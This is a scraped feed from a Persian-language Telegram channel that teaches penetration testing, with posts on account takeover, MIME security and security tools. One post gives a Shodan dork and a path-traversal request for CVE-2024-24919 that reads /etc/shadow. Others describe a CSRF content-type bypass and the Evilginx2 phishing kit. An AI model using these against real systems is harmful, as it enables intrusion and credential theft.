Try Hack Box – Telegram
Try Hack Box
5.77K subscribers
682 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
آسیب پذیری ATO چیست؟

به طور خلاصه به جعل کردن یوزرنیم و پسورد یه کاربر و وارد شدن به حساب کاربری اون، ATO یا همون (Account Takeover) می‌گن. اگه به بیشتر خوندن علاقه دارید، این مقاله خیلی مفیده.

خلاصه مقاله معرفی شده که AI نوشته است:

تصاحب حساب کاربری (Account Takeover یا ATO) نوعی حمله سایبری است که در آن مهاجمان با استفاده از اطلاعات ورودی دزدیده‌شده مانند نام کاربری و رمز عبور، به حساب‌های آنلاین کاربران دسترسی پیدا می‌کنند. این اطلاعات معمولاً از طریق حملات مهندسی اجتماعی، نشت داده‌ها و حملات فیشینگ به دست می‌آید و سپس درt وب تاریک خریداری می‌شود. مهاجمان با استفاده از این اطلاعات، ربات‌هایی را برای تست ترکیبات مختلف رمز عبور و نام کاربری به کار می‌گیرند تا بتوانند به حساب‌های کاربری در سایت‌های مختلف مانند مالی، تجارت الکترونیک و شبکه‌های اجتماعی دسترسی پیدا کنند.

مجرمان سایبری پس از تأیید اطلاعات حساب‌ها، این اطلاعات را می‌فروشند یا از آنها برای سوءاستفاده از حساب‌ها استفاده می‌کنند. این حملات نوعی سرقت هویت به شمار می‌آیند.

یکی از دلایل موفقیت این حملات، عدم تغییر منظم رمزهای عبور توسط کاربران و استفاده مجدد از جزئیات ورود به سیستم در سایت‌های مختلف است. مهاجمان می‌توانند با استفاده از ابزارهای اتوماتیک حملات جستجوی فراگیر و پر کردن اطلاعات کاربری (Credential Stuffing) را انجام دهند.

این نوع حملات به ویژه در مؤسسات مالی خطرناک است زیرا می‌تواند به سرقت مستقیم پول از حساب‌های کاربری منجر شود. برای مقابله با این حملات، مؤسسات می‌توانند از روش‌های مختلفی مانند تأیید هویت چندعاملی (MFA)، سیستم‌های ردیابی حساب و فناوری‌های مبتنی بر هوش مصنوعی استفاده کنند. همچنین، استفاده از فایروال‌های برنامه‌های وب (WAF) برای شناسایی و مسدود کردن ترافیک مخرب می‌تواند به جلوگیری از حملات ATO کمک کند.
By -> imem!
Media is too big
VIEW IN TELEGRAM
پایتون برای مبتدیان - دوره کامل.
480p
@TryHackBox
آیا می‌دانید URN چیست؟

درواقع URN یا (نام یکنواخت منابع) یکی از انواع URI است که به عنوان یک نام یکتا و پایدار برای یک منبع خاص عمل می‌کند، بدون توجه به مکانی که این منبع در آن قرار دارد. این به این معناست که یک URN می‌تواند برای شناسایی یک منبع خاص استفاده شود حتی اگر مکان فیزیکی یا الکترونیکی آن منبع تغییر کند.

تفاوت URN با URL چیست؟

برخلاف URL (یک نوع دیگر از URI)، که مکان دقیق یک منبع را شامل می‌شود (مانند آدرس وب سایت)، URN بیشتر به عنوان یک شناسه ثابت و یکتا عمل می‌کند که با تغییر مکان منبع، ثابت باقی می‌ماند. برای مثال، یک URN می‌تواند یک سند یا کتاب را شناسایی کند بدون اینکه نیاز باشد مکان دقیق آن سند یا کتاب مشخص شود.

چالش‌های استفاده از URN

استفاده از URN‌ها همچنان در مرحله‌ی آزمایشی قرار دارد و به طور گسترده‌ای پذیرفته نشده است. برای کارکرد موثر URN‌ها، نیاز به یک زیرساخت پشتیبان وجود دارد که بتواند مکان منابع را مشخص کند. عدم وجود چنین زیرساختی، مانعی برای پذیرش گسترده URN‌ها بوده است. اما URN‌ها پتانسیل جالبی برای آینده دارند.
Ethical_Hacking_in_15_Hours_2023_Edition_Learn_to_Hack_3FNYvj2U0HM.mp4
313.2 MB
هک اخلاقی در 15 ساعت - نسخه 2023 - آموزش هک کردن! (قسمت 1)؛
480p
@TryHackBox
👍1
🖥 Evilginx2
- ابزار فیشینگ

ابزاری است که برای انجام حملات فیشینگ و گرفتن اطلاعات کاربری طراحی شده است. این به شما امکان می دهد وب سایت های جعلی ایجاد کنید که برای رهگیری ورود کاربران، رمز عبور و سایر داده های حساس استفاده می شود.

- این ابزار فرصت های زیادی را برای انجام حملات فیشینگ فراهم می کند، از جمله:

1. ایجاد صفحات وب جعلی برای سرویس های آنلاین محبوب.
2. تجزیه و تحلیل جلسات کاربر.
3. اتوماسیون پروسس گرفتن اعتبار.

https://github.com/kgretzky/evilginx2

#Phishing
@TryHackBox
در حال حاضر ما هیچ دوره ای نداریم ولی در نظر داریم یک بخش خرید اشتراکی ایجاد کنیم تا شما عزیزان بتوانید در دوره های معتبر فارسی شرکت کنید و از آموزش بهره ببرید .
آیا موافق برگزاری خرید اشتراکی هستید ؟
Final Results
61%
بله
39%
خیر
👎5👍2
این بحث خرید اشتراکی بخاطر درخواست چند نفر از شما عزیزان بوده وگر نه ما همچین چیزی تا بحال نداشتیم .
🔥1
Media is too big
VIEW IN TELEGRAM
هک اخلاقی در 15 ساعت - نسخه 2023 - آموزش هک کردن! (قسمت 2)؛
@TryHackBox
1
This media is not supported in your browser
VIEW IN TELEGRAM
🖥 IntelOwl
- تجزیه و تحلیل تهدید شبکه

یک ابزار تحقیقاتی باز است که به تجزیه و تحلیل تهدیدهای مختلف امنیت اطلاعات کمک می کند. قابلیت جمع آوری، تجزیه و تحلیل و تجسم اطلاعات در مورد تهدیدات احتمالی مانند فایل های مخرب، URL ها، آدرس های IP و دامنه ها را فراهم می کند.

- این ابزار به شما امکان می دهد انواع مختلفی از تجزیه و تحلیل را انجام دهید، مانند:
1. تجزیه و تحلیل استاتیک فایل ها.
2. جستجوی اطلاعات در مورد تهدیدات در منابع باز.
3. آدرس های IP و دامنه ها را برای اتصالات با تهدیدات شناخته شده بررسی کنید.
https://github.com/intelowlproject/IntelOwl
#Recon
@TryHackBox
1👍1
Try Hack Box pinned «در حال حاضر ما هیچ دوره ای نداریم ولی در نظر داریم یک بخش خرید اشتراکی ایجاد کنیم تا شما عزیزان بتوانید در دوره های معتبر فارسی شرکت کنید و از آموزش بهره ببرید .
آیا موافق برگزاری خرید اشتراکی هستید ؟
»
🥷 AskHackers Search
- ابزار جستجوی هوش مصنوعی بر اساس داده‌های Hacker News!

هکر نیوز یک منبع قابل اعتماد و محبوب برای آخرین اخبار و گزارش های فنی در مورد امنیت سایبری و هک است.

اکنون پاسخ سوالات شما در جستجوی AskHackers بر اساس نظرات موجود در آنجا خواهد بود و در اصل، می توانید از هکرهای سراسر جهان بپرسید.

‌‌https://askhackers.com/
@TryHackBox
This media is not supported in your browser
VIEW IN TELEGRAM
افزایش دسترسی لینوکس برای مبتدیان
@TryHackBox
🖥 TLS Prober
- تجزیه و تحلیل TLS

ابزاری است که به طور خاص برای تجزیه و تحلیل امنیتی پروتکل TLS طراحی شده است.

- این ابزار قابلیت اسکن امنیت TLS را دارد. این به شناسایی نقاط ضعف در تنظیمات TLS کمک می کند و توانایی بهبود امنیت اطلاعات ارسال شده را فراهم می کند.

https://github.com/WestpointLtd/tls_prober

#Tools #Network
@TryHackBox
🖥 مخزن: DFTDC
- غیرفعال کردن تله متری

این مجموعه ای از تنظیمات مختلف در صفحه گزینه های فایرفاکس است که به به حداقل رساندن ارسال تله متری و جمع آوری داده ها کمک می کند.

- توضیح مهم: پس از استفاده از مخزن، با تغییر این تنظیمات، فایرفاکس همچنان داده ها را جمع آوری و به سرورهای خود ارسال می کند، اما در مقادیر بسیار کمتر.


https://github.com/K3V1991/Disable-Firefox-Telemetry-and-Data-Collection
#Firefox #Data #Telemetry
@TryHackBox
همه در مورد CVE-2024-24919 می نویسند و ما در مورد آن خواهیم نوشت.

🔍 Dork for Shodan: noscript:"Check Point" ssl:"target"

عملیات👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#CVE
@TryHackBox
💡 یک دور زدن ساده CSRF برای بررسی اینکه آیا تارگت شما داده های JSON را بدون توکن ضد CSRF ارسال می کند یا خیر

نوع محتوا را از application/json به text/plain تغییر دهید و ببینید آیا همچنان درخواست را می‌پذیرد یا خیر.

#tips #bugbounty
@TryHackBox
Try Hack Box pinned Deleted message
مفهوم MIME در HTML چیست؟
درواقع MIME (Multipurpose Internet Mail Extensions) یک استاندارد برای مشخص کردن نوع محتوا (Content Type) است که در پروتکل‌های اینترنتی مانند HTTP استفاده می‌شود. این استاندارد، فرمت داده‌هایی را که در یک ارتباط اینترنتی انتقال می‌یابد مشخص می‌کند. هر MIME type از دو بخش اصلی تشکیل شده است:
نوع اصلی (Type): نشان‌دهنده نوع کلی محتوا است (مثلاً text, image, audio, video, application).
زیرنوع (Subtype): نشان‌دهنده فرمت خاص محتوای اصلی است (مثلاً text/html, image/png, application/json).
در HTML، هدر HTTP Content-Type معمولاً برای اعلام نوع MIME محتوا استفاده می‌شود. به عنوان مثال، برای محتوای HTML، نوع MIME معمولاً text/html است.

تاثیر MIME در امنیت وب‌سایت‌ها
نوع MIME می‌تواند تاثیر زیادی در امنیت یک وب‌سایت داشته باشد. مشکلات امنیتی عمده‌ای که با نوع MIME در ارتباط هستند شامل موارد زیر می‌شوند:

کاربرد MIME Sniffing
برخی مرورگرها به صورت خودکار سعی می‌کنند نوع فایل‌ها را براساس محتوا تشخیص دهند، حتی اگر نوع MIME نادرستی اعلام شده باشد. این فرآیند می‌تواند به مشکلات امنیتی منجر شود، چرا که مهاجمان می‌توانند با تغییر نوع MIME، محتواهای مخرب (مانند اسکریپت‌های جاوااسکریپت) را به جای محتواهای ایمن (مانند تصاویر) به مرورگر بفرستند.
به عنوان مثال، اگر مرورگر نوع فایل را به جای image/jpeg به text/html تغییر دهد، ممکن است باعث اجرای اسکریپت‌های مخرب در صفحه شود.

انواع X-Content-Type-Options Header

این هدر می‌تواند با تنظیم مقدار nosniff به مرورگر بگوید که نباید نوع MIME محتوا را تغییر دهد و باید آن را همانطور که توسط سرور مشخص شده است تفسیر کند. این تنظیم می‌تواند جلوی حملات XSS (Cross-Site Scripting) را بگیرد.

حملات XSS
اگر نوع MIME نادرست اعلام شود و مرورگر محتوا را به درستی تشخیص ندهد، مهاجمان می‌توانند از این موضوع برای تزریق کدهای مخرب در صفحات وب استفاده کنند. به عنوان مثال، اگر یک فایل جاوااسکریپت به عنوان یک تصویر اشتباهاً ارسال شود، مرورگر ممکن است اسکریپت را اجرا کند و به مهاجم اجازه دهد که حملات XSS انجام دهد.

تاثیر MIME در تست نفوذ
در تست نفوذ، نوع MIME یکی از مولفه‌هایی است که بررسی می‌شود تا اطمینان حاصل شود که سرور به درستی نوع محتوا را مشخص می‌کند و مرورگر به درستی این اطلاعات را پردازش می‌کند. تست نفوذکارها معمولاً به دنبال مشکلاتی مانند:
یک-> MIME Confusion: تلاش برای تغییر نوع MIME فایل‌ها و بررسی این که آیا می‌توان محتوای مخرب را تزریق کرد.
دوـ> MIME Sniffing Bypass: بررسی اینکه آیا مرورگر می‌تواند نوع محتوا را نادرست تشخیص دهد و محتوای مخرب اجرا شود.
سه-> X-Content-Type-Options Testing: بررسی اینکه آیا هدر X-Content-Type-Options به درستی تنظیم شده است یا خیر.

در مجموع، کنترل صحیح نوع MIME یکی از روش‌های مهم برای جلوگیری از حملات مختلف وب است و نقش مهمی در امنیت وب‌سایت‌ها دارد.
@TryHackBox
👍2
🖥 مخزن: x64dbg - تجزیه و تحلیل فایل های اجرایی

یک دیباگر برای ویندوز است که طیف گسترده ای از ویژگی ها را برای تجزیه و تحلیل و اشکال زدایی فایل های اجرایی ارائه می دهد.

— این ابزار شامل پشتیبانی از اشکال زدایی برنامه های x86 و x64، امکان مشاهده و تغییر رجیسترهای پردازنده، ردیابی اجرای دستورالعمل ها و تجزیه و تحلیل پشته و پشته است.

https://github.com/x64dbg/x64dbg
#ReverseEngeneering
@TryHackBox
Best Google Dorker !🔬
Best-Google-Dorker.py
3.4 KB
Run: Python2
🔥1